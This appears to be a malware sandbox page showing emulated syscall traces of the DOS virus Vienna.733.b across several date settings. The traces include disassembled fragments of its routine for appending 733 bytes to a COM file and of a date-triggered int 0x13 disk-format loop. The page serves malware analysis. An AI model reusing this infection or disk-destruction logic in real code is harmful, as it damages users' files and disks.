Sample viewer

vx.netlux.org/Virus.DOS.Vienna.733.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:32.219680503Z 48 PC: 12ba6 | Get DOS version
2018-12-17T22:50:32.221559671Z 47 PC: 12bb2 | Get disk transfer address
2018-12-17T22:50:32.223779583Z 26 PC: 12bc5 | Set disk transfer address
2018-12-17T22:50:32.224826546Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-17T22:50:32.2266227Z 42 PC: 12bdf | Get date 0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
0x12c00: inc byte ptr [0x365]
0x12c04: loop 0x12bf3
0x12c06: mov ah, 5
0x12c08: mov ch, 0
0x12c0a: mov dh, 0
0x12c0c: mov dl, byte ptr [0x365]
2018-12-17T22:50:32.234368294Z 42 PC: 12beb | Get date 0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
0x12c00: inc byte ptr [0x365]
0x12c04: loop 0x12bf3
0x12c06: mov ah, 5
0x12c08: mov ch, 0
0x12c0a: mov dh, 0
0x12c0c: mov dl, byte ptr [0x365]
0x12c10: int 0x13
0x12c12: ret
0x12c13: pop si
0x12c14: push si
0x12c15: add si, 0x2d
0x12c19: lodsb al, byte ptr [si]
2018-12-17T22:50:32.23967111Z 1 PC: 12d73 | Character input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:35.738158899Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:35.739721631Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:35.740757941Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:35.74161413Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:35.743127313Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:35.747563821Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:35.753726053Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:35.771572146Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:35.786574485Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:35.788156409Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:35.790510824Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:35.798635239Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:35.800267415Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:35.811272583Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:35.813680932Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:35.82098508Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:35.822485609Z 62 PC: 12d99 | Close file
2018-12-25T12:27:35.831362087Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:35.842435645Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:35.843645954Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:35.850103084Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1994,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:36.089429292Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:36.091123426Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:36.092569646Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:36.093989126Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:36.09666028Z 42 PC: 12bdf | Get date 0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
0x12c00: inc byte ptr [0x365]
0x12c04: loop 0x12bf3
0x12c06: mov ah, 5
0x12c08: mov ch, 0
0x12c0a: mov dh, 0
0x12c0c: mov dl, byte ptr [0x365]
2018-12-25T12:27:36.099985719Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:36.106108003Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:36.111830738Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:36.137123043Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:36.162624794Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:36.164245986Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:36.167748393Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:36.174304924Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:36.175961055Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:36.18554885Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:36.187113768Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:36.193717234Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:36.200531572Z 62 PC: 12d99 | Close file
2018-12-25T12:27:36.208513767Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:36.222187221Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:36.228884298Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:36.240548824Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:36.086892422Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:36.088975518Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:36.090170938Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:36.091469602Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:36.094208941Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:36.1005849Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:36.113028517Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:36.135970424Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:36.142926169Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:36.14423819Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:36.146329926Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:36.153641204Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:36.155020591Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:36.163231724Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:36.165094319Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:36.171742694Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:36.173481718Z 62 PC: 12d99 | Close file
2018-12-25T12:27:36.194584875Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:36.204597954Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:36.205655818Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:36.211978151Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:36.208061976Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:36.211262423Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:36.212785639Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:36.214267995Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:36.226186237Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:36.23243331Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:36.238011686Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:36.254007891Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:36.27297472Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:36.276675301Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:36.285241672Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:36.292791877Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:36.295295033Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:36.310773489Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:36.313515197Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:36.326526319Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:36.329350176Z 62 PC: 12d99 | Close file
2018-12-25T12:27:36.344547224Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:36.364283876Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:36.379135336Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:36.384902865Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:36.240706801Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:36.253794091Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:36.255416086Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:36.257013233Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:36.258982696Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:36.2699854Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:36.277525155Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:36.295583227Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:36.304937814Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:36.319888392Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:36.322343711Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:36.330079465Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:36.331135236Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:36.336798043Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:36.338634126Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:36.34568446Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:36.347026013Z 62 PC: 12d99 | Close file
2018-12-25T12:27:36.355797841Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:36.376566404Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:36.378084583Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:36.384689872Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10248,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:36.338689267Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:27:36.340986984Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:27:36.342765546Z 26 PC: 12bc5 | Set disk transfer address
2018-12-25T12:27:36.344079472Z 42 PC: 12bd2 | Get date 0x12bd2: cmp cx, 0x7ca
0x12bd6: jge 0x12bdb
0x12bd8: jmp 0x12c13
0x12bda: nop
0x12bdb: mov ah, 0x2a
0x12bdd: int 0x21
0x12bdf: cmp dh, 0xb
0x12be2: jge 0x12be7
0x12be4: jmp 0x12c13
0x12be6: nop
0x12be7: mov ah, 0x2a
0x12be9: int 0x21
0x12beb: cmp dl, 0xd
0x12bee: jge 0x12bf3
0x12bf0: jmp 0x12c13
0x12bf2: nop
0x12bf3: mov al, byte ptr [0x365]
0x12bf6: call 0x12c06
0x12bf9: cmp byte ptr [0x365], 0x19
0x12bfe: je 0x12c13
2018-12-25T12:27:36.346523731Z 78 PC: 12c96 | Find first file
2018-12-25T12:27:36.353440776Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T12:27:36.360642488Z 67 PC: 12ce6 | Get or set file attributes
2018-12-25T12:27:36.378060843Z 61 PC: 12cf1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:36.385085093Z 87 PC: 12cfd | Get or set file date and time
2018-12-25T12:27:36.387050722Z 44 PC: 12d09 | Get time 0x12d09: and dh, 7
0x12d0c: jne 0x12d1e
0x12d0e: mov ah, 0x40
0x12d10: mov cx, 5
0x12d13: mov dx, si
0x12d15: add dx, 0x9d
0x12d19: int 0x21
0x12d1b: jmp 0x12d82
0x12d1d: nop
0x12d1e: mov ah, 0x3f
0x12d20: mov cx, 3
0x12d23: mov dx, 0x1d
0x12d26: nop
0x12d27: add dx, si
0x12d29: int 0x21
0x12d2b: jb 0x12d82
0x12d2d: cmp ax, 3
0x12d30: jne 0x12d82
0x12d32: mov ax, 0x4202
0x12d35: mov cx, 0
2018-12-25T12:27:36.389253286Z 63 PC: 12d2b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:36.3963424Z 66 PC: 12d3d | Move file pointer
2018-12-25T12:27:36.398405014Z 64 PC: 12d61 | Write file or device (Write 733 bytes on handle 5)
2018-12-25T12:27:36.407387931Z 66 PC: 12d73 | Move file pointer
2018-12-25T12:27:36.408719238Z 64 PC: 12d82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:36.416112999Z 87 PC: 12d95 | Get or set file date and time
2018-12-25T12:27:36.422208002Z 62 PC: 12d99 | Close file
2018-12-25T12:27:36.430581508Z 67 PC: 12da8 | Get or set file attributes
2018-12-25T12:27:36.441123675Z 26 PC: 12db5 | Set disk transfer address
2018-12-25T12:27:36.442838041Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:27:36.448819186Z 76 PC: 12a86 | Terminate with return code (Return code = '36')